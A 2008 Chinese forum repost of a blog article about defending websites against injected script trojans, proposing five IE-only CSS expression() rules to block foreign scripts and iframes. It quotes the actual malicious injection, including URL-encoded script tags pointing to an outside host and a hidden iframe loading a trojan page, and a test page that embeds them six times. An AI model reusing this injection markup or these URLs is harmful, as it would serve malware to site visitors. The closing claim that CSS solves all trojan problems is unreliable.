计算机技术论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

  • 欢迎访问 计算机技术论坛-电脑迷与初学者的家园!由于论坛管理严格,新注册会员可能遇到各种问题,无法解决的请发邮件 admin@jsjbbs.cn
查看: 4364|回复: 0

网页木马解决方法

[复制链接]
发表于 2008-11-18 21:35:45 | 显示全部楼层 |阅读模式
此文不是本人所写,转自一位空间访客的博客:http://hi.baidu.com/351net


还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。
前不久《http://bbs.blueidea.com/thread-2818052-1-1.html一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:
注意,以下地址含有木马,请不要轻易访问:
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
汗死,一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:
document.write(\"<div style=&#39;display:none&#39;>\")
document.write(\"<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>\")
document.write(\"</div>\")
又用迅雷下载http://a.158dm.com/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!
...
var Kfqq, Qqs=\"784378237\"; qwfgsg=\"LLLL\\\\XXXXXLD\"; Kfqq = Qqs;
(...略)(下面还有N个统计的JS代码)
针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,<script>木马的特点是什么:
<script src=http://%76%63%63%64%2E%63%6E></script>
对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。
来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈:
解决方案1:
iframe{n1ifm:expression(this.src=&#39;about:blank&#39;,this.outerHTML=&#39;&#39;);}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf(&#39;http&#39;)==0)?document.write(&#39;木马被成功隔离!&#39;):&#39;&#39;);}
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点:访客无法看到被感染了<script>木马的页面。
解决方案2:
iframe{nifm2:expression(this.src=&#39;about:blank&#39;,this.outerHTML=&#39;&#39;);}
script{no2js:expression((this.src.toLowerCase().indexOf(&#39;http&#39;)==0)?document.close():&#39;&#39;);}
原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。
解决方案3:
iframe{ni3fm:expression(this.src=&#39;about:blank&#39;,this.outerHTML=&#39;&#39;);}
script{n3ojs:expression((this.src.toLowerCase().indexOf(&#39;http&#39;)==0)?document.execCommand(&#39;stop&#39;):&#39;&#39;);}
原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是JS模拟IE停止按钮的一种方法。
解决方案4:
iframe{nif4m:expression(this.src=&#39;about:blank&#39;,this.outerHTML=&#39;&#39;);}
script{noj4s:expression(if(this.src.indexOf(&#39;http&#39;)==0)this.src=&#39;res://ieframe.dll/dnserror.htm&#39;);}
原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。
解决方案5:
iframe{nifm5:expression(this.src=&#39;about:blank&#39;,this.outerHTML=&#39;&#39;);}
script{noj5s:expression((this.id.toLowerCase().indexOf(&#39;vok&#39;)!=-1)?document.write(&#39;木马被成功隔离!&#39;):&#39;&#39;));}
第五种方案的页面HTML源代码<script>中要加入以\"lh\"为前缀的id,如lhWeatherJSapi,<script src=\"***/**.js\" id=\"lhSearchJSapi\"></script> 
以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试)
<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
<html xmlns=\"http://www.w3.org/1999/xhtml\">
<head>
<meta http-equiv=\"Content-Type\" c />
<title>让JS木马的进程迅速中止的CSS代码</title>
<style type=\"text/css\" id=\"LinrStudio\">
/*<![CDATA[*/
iframe{nhk1:expression(this.src=&#39;about:blank&#39;,this.outerHTML=&#39;&#39;);}
script{ngz1:expression((this.src.indexOf(&#39;http&#39;)==0)?document.close():&#39;&#39;);}
/* 以后请在此关注最新木马处理方法:http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
</style>
</head>
<body>
<script type=\"text/javascript\" src=\"1.js\"></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=\"http://%76%63%63%64%2E%63%6E\" type=\"text/javascript\"></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的1
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的2
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的3
<script src=http://%76%63%63%64%2E%63%6E></script>
</body>
</html>
其中1.js是自己本站的:
document.write(\"我是本站的JS文件\");
document.write(\"<img src=&#39;http://www.baidu.com/images/logo.gif&#39; />\");
我的测试环境是:
Windows XP SP2 和windows Vista SP1
IE6/IE7/IE8
已全部打好补丁。
综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

无图版|手机版|计算机技术论坛 JSJBBS.CN @ 2008-2024 ( 鲁ICP备17021708号 )

技术支持 : 北京康盛新创科技有限责任公司

快速回复 返回顶部 返回列表